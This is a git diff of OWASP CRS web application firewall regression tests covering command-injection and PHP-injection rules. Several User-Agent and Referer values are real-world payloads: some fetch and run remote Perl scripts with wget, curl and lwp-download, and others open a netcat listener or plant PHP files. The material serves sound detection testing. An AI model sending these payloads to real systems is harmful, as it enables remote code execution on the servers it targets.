+              User-Agent: ";CHMOD +X EVIL.PHP"
+            method: GET
+            port: 80
+            uri: /
+            version: HTTP/1.0
+          output:
+            log_contains: id "932239"
+  - test_title: 932239-3
+    desc: System Command Injection (932239) from old modsec regressions
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip,deflate
+              Accept-Language: en-us,en;q=0.5
+              Host: localhost
+              Keep-Alive: '300'
+              Proxy-Connection: keep-alive
+              User-Agent: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.1
+          output:
+            log_contains: id "932239"
+  - test_title: 932239-4
+    desc: System Command Injection (932239) from old modsec regressions
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip,deflate
+              Accept-Language: en-us,en;q=0.5
+              Host: localhost
+              Keep-Alive: '300'
+              Proxy-Connection: keep-alive
+              User-Agent: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.1
+          output:
+            log_contains: id "932239"
+  - test_title: 932239-5
+    desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: Something true positive &#8222;The Title&#8221;. After space or new line more characters
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-6
+    desc: System Command Injection (932239) from old modsec regressions
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip,deflate
+              Accept-Language: en-us,en;q=0.5
+              Host: localhost
+              Keep-Alive: '300'
+              Proxy-Connection: keep-alive
+              User-Agent: "OWASP CRS test agent"
+              Referer: system('echo cd /tmp;wget http://turbatu.altervista.org/apache_32.png -O p2.txt;curl -O http://turbatu.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://turbatu.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.1
+          output:
+            log_contains: id "932239"
+  - test_title: 932239-7
+    desc: System Command Injection (932239) from old modsec regressions
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip,deflate
+              Accept-Language: en-us,en;q=0.5
+              Host: localhost
+              Keep-Alive: '300'
+              Proxy-Connection: keep-alive
+              User-Agent: "OWASP CRS test agent"
+              Referer: http://ricky.ilmerlodellarocca.com/upload.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg; appa.jpg;perl appa.jpg;rm -rf appa.jpg;wget http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;curl -O http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;lwp-download http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt ca.php;mv ca.php ca.php;chmod 755 ca.php
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.1
+          output:
+            log_contains: id "932239"
+  - test_title: 932239-8
+    desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Referer: Something true positive &#8222;The Title&#8221;. After space or new line more characters
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+              Content-Type: application/x-www-form-urlencoded
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-9
+    desc: "False negative report - user agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: ;cp /var/log/apache2/error.log evil.php
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.0
+          output:
+            log_contains: id "932239"
+  - test_title: 932239-10
+    desc: "Negative test on known user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "python-requests/2.31.0"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-11
+    desc: "Negative test on known user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "Python-urllib/3.9"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-12
+    desc: "Negative test on known user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-13
+    desc: "Negative test on known user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "w3m/0.5.1"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-14
+    desc: "Negative test on known user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-15
+    desc: "Negative test on known user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "wget"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-16
+    desc: "Negative test on known user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "curl/7.81.0"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-17
+    desc: "Negative test on known user-agent"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "Cpanel-HTTP-Client/1.0"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Accept-Encoding: gzip, deflate, br
+              Accept-Language: en-us,en;q=0.5
+            method: GET
+            port: 80
+            uri: "/"
+            version: HTTP/1.1
+          output:
+            no_log_contains: id "932239"
+  - test_title: 932239-18
+    desc: "IXMZUXBG"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              User-Agent: a=nc&&$a -nlvp 555
+              Host: localhost
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932239"
+  - test_title: 932239-19
+    desc: "IXMZUXBG"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              User-Agent: "OWASP CRS test agent"
+              Host: localhost
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Referer: a=nc&&$a -nlvp 555
+            method: GET
+            port: 80
+            uri: /get
+            version: HTTP/1.0
+          output:
+            log_contains: id "932239"
diff --git a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
index a951191..2d6771a 100644
--- a/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
+++ b/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
@@ -19,7 +19,7 @@ tests:
             uri: "/get?932260-1=bash%20-c%20%22echo%20test%22"
             protocol: "http"
           output:
-            log_contains: id "932260"
+            no_log_contains: id "932260"
   - test_title: 932260-2
     stages:
       - stage:
@@ -35,7 +35,7 @@ tests:
             uri: '/post'
             protocol: "http"
           output:
-            log_contains: id "932260"
+            no_log_contains: id "932260"
   - test_title: 932260-3
     stages:
       - stage:
@@ -163,40 +163,6 @@ tests:
           output:
             log_contains: id "932260"
   - test_title: 932260-11
-    desc: "Positive test: Unix Command Injection - $SHELL test"
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Host: "localhost"
-              User-Agent: "OWASP CRS test agent"
-            method: GET
-            port: 80
-            # code=$SHELL -c "echo hi"
-            uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22"
-            version: HTTP/1.0
-          output:
-            log_contains: id "932260"
-  - test_title: 932260-12
-    desc: "Positive test: Unix Command Injection - ${SHELL} test"
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Host: "localhost"
-              User-Agent: "OWASP CRS test agent"
-            method: GET
-            port: 80
-            # code=${SHELL} -c "echo hi"
-            uri: /get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22
-            version: HTTP/1.0
-          output:
-            log_contains: id "932260"
-  - test_title: 932260-13
     desc: "Positive test: Unix Command Injection - busybox test"
     stages:
       - stage:
@@ -213,7 +179,7 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932260"
-  - test_title: 932260-14
+  - test_title: 932260-12
     desc: Remote Command Execution bypass with time
     stages:
       - stage:
@@ -227,11 +193,11 @@ tests:
               Accept-Language: en-us,en;q=0.5
             method: GET
             port: 80
-            uri: "/get?foo=time+unzip+"
+            uri: "/get?foo=time+bsdtar+"
             version: HTTP/1.1
           output:
             log_contains: id "932260"
-  - test_title: 932260-15
+  - test_title: 932260-13
     desc: Remote Command Execution bypass with time negative test
     stages:
       - stage:
@@ -249,7 +215,7 @@ tests:
             version: HTTP/1.1
           output:
             no_log_contains: id "932260"
-  - test_title: 932260-16
+  - test_title: 932260-14
     desc: Remote Command Injection test for BB finding 935E1D91
     stages:
       - stage:
@@ -266,8 +232,8 @@ tests:
             uri: "/get?foo=time+curl+coreruleset.org"
             version: HTTP/1.1
           output:
-            log_contains: id "932260"
-  - test_title: 932260-17
+            no_log_contains: id "932260"
+  - test_title: 932260-15
     desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt
     stages:
       - stage:
@@ -284,8 +250,8 @@ tests:
             uri: "/get?foo=ti''me+curl+coreruleset.org"
             version: HTTP/1.1
           output:
-            log_contains: id "932260"
-  - test_title: 932260-18
+            no_log_contains: id "932260"
+  - test_title: 932260-16
     desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case
     stages:
       - stage:
@@ -303,7 +269,7 @@ tests:
             version: HTTP/1.1
           output:
             log_contains: id "932260"
-  - test_title: 932260-19
+  - test_title: 932260-17
     desc: "'find' direct command injection FP test"
     stages:
       - stage:
@@ -319,7 +285,7 @@ tests:
             protocol: "http"
           output:
             no_log_contains: id "932260"
-  - test_title: 932260-20
+  - test_title: 932260-18
     desc: "'find' direct command injection FP test"
     stages:
       - stage:
@@ -335,7 +301,7 @@ tests:
             protocol: "http"
           output:
             no_log_contains: id "932260"
-  - test_title: 932260-21
+  - test_title: 932260-19
     desc: "'ping' direct command injection FP test"
     stages:
       - stage:
@@ -351,3 +317,50 @@ tests:
             protocol: "http"
           output:
             no_log_contains: id "932260"
+  - test_title: 932260-20
+    desc: "FP for 'head of'"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: "OWASP CRS test agent"
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: "/post"
+            protocol: "http"
+            data: "job_title=head%20of"
+          output:
+            no_log_contains: id "932260"
+  - test_title: 932260-21
+    desc: "False positive test: 'evaluation' (FP while rule looks for 'eval')"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: "OWASP CRS test agent"
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/get?word=evaluation'
+          output:
+            no_log_contains: id "932260"
+  - test_title: 932260-22
+    desc: "False positive test: 'schedule' (FP while rule looks for 'sched')"
+    stages:
+      - stage:
+          input:
+            dest_addr: "127.0.0.1"
+            method: "GET"
+            port: 80
+            headers:
+              User-Agent: "OWASP CRS test agent"
+              Host: "localhost"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            uri: '/get?word=schedule'
+          output:
+            no_log_contains: id "932260"
diff --git a/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
index d1f0ce7..dc2ab42 100644
--- a/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
+++ b/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
@@ -6,7 +6,7 @@ meta:
   name: 933150.yaml
 tests:
   - test_title: 933150-1
-    desc: pmf
+    desc: phpinfo
     stages:
       - stage:
           input:
@@ -16,7 +16,7 @@ tests:
               User-Agent: "OWASP CRS test agent"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
             port: 80
-            uri: /base64_decode
+            uri: /phpinfo
           output:
             log_contains: id "933150"
   - test_title: 933150-2
@@ -48,7 +48,7 @@ tests:
           output:
             log_contains: id "933150"
   - test_title: 933150-4
-    desc: base64_decode
+    desc: bzdecompress
     stages:
       - stage:
           input:
@@ -62,7 +62,7 @@ tests:
           output:
             log_contains: id "933150"
   - test_title: 933150-5
-    desc: base64_decode
+    desc: call_user_func
     stages:
       - stage:
           input:
@@ -86,7 +86,7 @@ tests:
               User-Agent: "OWASP CRS test agent"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
             port: 80
-            uri: /?foo=FOOcall_user_func
+            uri: /?foo=FOOfsockopen
           output:
             log_contains: id "933150"
   - test_title: 933150-7
@@ -100,7 +100,7 @@ tests:
               User-Agent: "OWASP CRS test agent"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
             port: 80
-            uri: /?foo=FOOcall_user_func
+            uri: /?foo=FOOgzdecode
           output:
             log_contains: id "933150"
   - test_title: 933150-8
@@ -114,11 +114,11 @@ tests:
               User-Agent: "OWASP CRS test agent"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
             port: 80
-            uri: /?foo=FOOcall_user_func
+            uri: /?foo=FOOGzInFlAtE
           output:
             log_contains: id "933150"
   - test_title: 933150-9
-    desc: GzInFlAtE
+    desc: pHpInFo
     stages:
       - stage:
           input:
@@ -128,11 +128,11 @@ tests:
               User-Agent: "OWASP CRS test agent"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
             port: 80
-            uri: /?foo=FOOcall_user_func
+            uri: /?foo=FOOpHpInFo
           output:
             log_contains: id "933150"
   - test_title: 933150-10
-    desc: GzInFlAtE
+    desc: gzuncompress
     stages:
       - stage:
           input:
@@ -146,7 +146,7 @@ tests:
           output:
             log_contains: id "933150"
   - test_title: 933150-11
-    desc: GzInFlAtE
+    desc: fsockopen
     stages:
       - stage:
           input:
@@ -170,11 +170,11 @@ tests:
               User-Agent: "OWASP CRS test agent"
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
             port: 80
-            uri: /?bar=pfsockopen%28%27foo%27%2C%2025%29
+            uri: /?bar=posix_getpwuiD%28%27foo%27%2C%2025%29
           output:
             log_contains: id "933150"
   - test_title: 933150-13
-    desc: posix_getpwuiD
+    desc: shell_exec
     stages:
       - stage:
           input:
@@ -194,7 +194,7 @@ tests:
     stages:
       - stage:
           input:
-            data: Shell%5fexec=bla
+            data: ZlIb%5fDeCoDe=bla
             dest_addr: 127.0.0.1
             headers:
               Host: localhost
@@ -237,3 +237,291 @@ tests:
             uri: /
           output:
             log_contains: id "933150"
+  - test_title: 933150-17
+    desc: function call regexp
+    stages:
+      - stage:
+          input:
+            data: foo=curl_iNit%28%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-18
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: posix_getegid%28%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /getegid
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-19
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /print_r
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-20
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /astrrev()
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-21
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /strrev
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-22
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /strrev(
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-23
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=eval
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-24
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=the%20files%20%28yep%29
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-25
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=exec%20%28
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-26
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=executor%28%29
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-27
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=cheval%28%24foo%29
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-28
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=audi%6ffile%28%24foo%29
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-29
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=the%20system%20is%20down%28%29
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-30
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=ecosystem%28%29
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-31
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=systems%28%29
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-32
+    desc: func\t/*foo\r\nbar*/\t (
+    stages:
+      - stage:
+          input:
+            data: x=Print_r%28%20%29
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?foo=system%20something%28%29
+          output:
+            log_contains: id "933150"
+  - test_title: 933150-33
+    desc: "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
+    stages:
+      - stage:
+          input:
+            data: x=dummydata
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?a=preview
+          output:
+            no_log_contains: id "933150"
+  - test_title: 933150-34
+    desc: "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
+    stages:
+      - stage:
+          input:
+            data: x=dummydata
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?a=exploration
+          output:
+            no_log_contains: id "933150"
diff --git a/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
index e395715..d67fdf9 100644
--- a/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
+++ b/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
@@ -38,7 +38,7 @@ tests:
           output:
             log_contains: id "933151"
   - test_title: 933151-3
-    desc: non-dangorous PHP functions, removed to reduce FP
